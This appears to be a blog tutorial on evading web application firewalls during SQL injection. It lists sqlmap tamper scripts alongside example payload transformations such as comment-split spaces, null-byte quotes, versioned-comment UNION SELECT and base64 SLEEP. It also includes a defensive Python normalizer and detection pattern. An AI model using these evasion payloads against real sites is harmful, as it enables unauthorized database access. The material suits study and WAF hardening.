### Phenomenon
When we inject and discover that there is a "watchdog", a WAF, in front of the application, it is disheartening. Still, most of the time the right move is to calm down and work out exactly which parameters and characters the filter blocks and how they can be bypassed. The tamper scripts shipped with sqlmap give us a lot of ready-made filter-evasion helpers.
Hint: "The entry has a dangerous character and has been intercepted"
Hint: "Please do not attempt to inject illegal characters in parameters"
### Deciding which script to use
1. `id=1 ` : tests whether a space is allowed
2. `id=1%201=1` : tests whether the equals sign is allowed
3. `id=1%201=1 select` : tests whether the keyword `select` is allowed
......
### Which characters are filtered, and which script to use
1. Spaces are filtered ----> [space2comment.py]
   * Input: select id from users
   * Output: select/**/id/**/from/**/users
   Spaces are filtered ----> [space2hash.py] ----> replaced with #
   Spaces are filtered ----> [space2morehash.py] ----> replaced with #
   Spaces are filtered ----> [space2plus.py] ----> replaced with +
2. Single quotes are filtered ----> [apostrophemask.py] ----> UTF-8 full-width character in place of the quote
   Single quotes are filtered (null-byte variant) ----> [apostrophenullencode.py]
   Example:
   * Input: 1 and '1'='1
   * Output: 1 and %00%271%00%27=%00%271
3. The equals sign is filtered ----> [equaltolike.py] ----> LIKE in place of =
   Example:
   * Input: SELECT * FROM users WHERE id=1
   * Output: SELECT * FROM users WHERE id LIKE 1
4. > is filtered ----> [greatest.py] ----> replaced with GREATEST
   Example:
   * Input: 1 and A > B
   * Output: 1 and GREATEST(A,B+1)=A
   ----> [between.py]
   Example:
   * Input: 1 and A > B--
   * Output: 1 and A NOT BETWEEN 0 AND B--
5. Quotes are filtered ----> [apostrophenullencode.py] (as in 2: the quote is replaced by %00%27)
   Example:
   * Input: 1 and '1'='1
   * Output: 1 and %00%271%00%27=%00%271
6. The database is MySQL ----> [halfversionedmorekeywords.py]
7. Append a null byte (%00) ----> [appendnullbyte.py]
   Example:
   * Input: 1 and 1=1
   * Output: 1 and 1=1%00
URL encoding ----> [charencode.py]
Example:
* Input: SELECT FIELD FROM%20TABLE
* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
Unicode (%uXXXX) encoding bypass ----> [charunicodeencode.py]
Example:
* Input: SELECT FIELD%20FROM TABLE
* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046
Random case conversion ----> [randomcase.py]
Example:
* Input: INSERT
* Output: InsERt
Wide-character bypass ----> [unmagicquotes.py]
Example:
* Input: 1' and 1=1
* Output: 1%bf%27 and 1=1--%20
Split SQL keywords with /**/ ----> [randomcomments.py]
Example:
* INSERT becomes In/**/s/**/ert
Add a versioned comment before each keyword ----> [versionedmorekeywords.py]
Example:
* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
* Output: 1/*!UNION*//*!ALL*//*!SELECT*//*!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS*//*!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
Base64 encoding bypass ----> [base64encode.py]
Example:
* Input: 1' AND SLEEP(5)#
* Output: MScgQU5EIFNMRUVQKDUpIw==
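Every tamper output above relies on the same weakness: the filter matches the raw request string instead of what the database parser will actually see. As an added example (not from the original post and not sqlmap code), the Python below canonicalizes a parameter value, undoing the encodings and comment tricks listed above, before applying a deliberately simple keyword rule; the sample values are constructed, and the whole-value base64 detection is a heuristic assumption.

```python
import base64
import re
from urllib.parse import unquote_plus

# Constructed sample values (not sqlmap output): one per tamper script listed above.
SAMPLES = {
    "space2comment": "select/**/id/**/from/**/users",
    "space2hash": "1%23Xq%0Aand%23Yz%0A1=1",
    "apostrophenullencode": "1 and %00%271%00%27=%00%271",
    "charencode": "%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45",
    "charunicodeencode": "%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0066%u0069%u0065%u006c%u0064%u0020%u0046%u0052%u004f%u004d",
    "randomcase": "InsERt",
    "versionedmorekeywords": "1/*!union*//*!all*//*!select*//*!null*/,/*!null*/",
    "unmagicquotes": "1%bf%27 and 1=1--%20",
    "base64encode": "MScgQU5EIFNMRUVQKDUpIw==",
}
_B64 = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")

def _maybe_base64(s: str) -> str:
    """Heuristic: if the whole value is base64 that decodes to printable ASCII, use the decoded text."""
    if _B64.match(s) and len(s) % 4 == 0:
        try:
            out = base64.b64decode(s, validate=True).decode("ascii")
            if out.isprintable():
                return out
        except (ValueError, UnicodeDecodeError):
            pass
    return s

def normalize(value: str) -> str:
    """Reduce a parameter value to the form the SQL parser would actually see."""
    s = value
    for _ in range(3):  # bounded loop so double encoding is undone too
        prev = s
        s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)  # %uXXXX
        s = unquote_plus(s)  # %XX, and form-encoded '+' as space (what space2plus relies on)
        if s == prev:
            break
    s = _maybe_base64(s)
    s = s.replace("\x00", "")                                # %00 from the null-byte scripts
    s = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", s, flags=re.S)  # MySQL executes /*!kw*/: keep kw
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.S)            # /**/ is whitespace to the parser
    s = re.sub(r"(?:#|--)[^\n]*(?:\n|$)", " ", s)           # '#...' and '--...' comments to EOL
    return re.sub(r"\s+", " ", s).strip().lower()
# Deliberately simple keyword rule; the point is that it runs on the canonical form.
_SQLI = re.compile(r"\b(?:union\s+(?:all\s+)?select|select\b.+\bfrom\b|insert\b|"
                   r"sleep\s*\(|and\s+'?\w+'?\s*=\s*'?\w+'?)")

def looks_like_sqli(value: str) -> bool:
    return _SQLI.search(normalize(value)) is not None
```

Run against the raw string, the keyword rule misses every sample; run against `normalize()`'s output, it catches all of them, which is why canonicalization before matching matters more than the length of the blocklist.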
Below are two summary files for everyone to download.
I will keep adding to this later; if you spot errors or know better methods, leave a message and we can learn from each other!!
SQL injection tamper bypasses the WAF firewall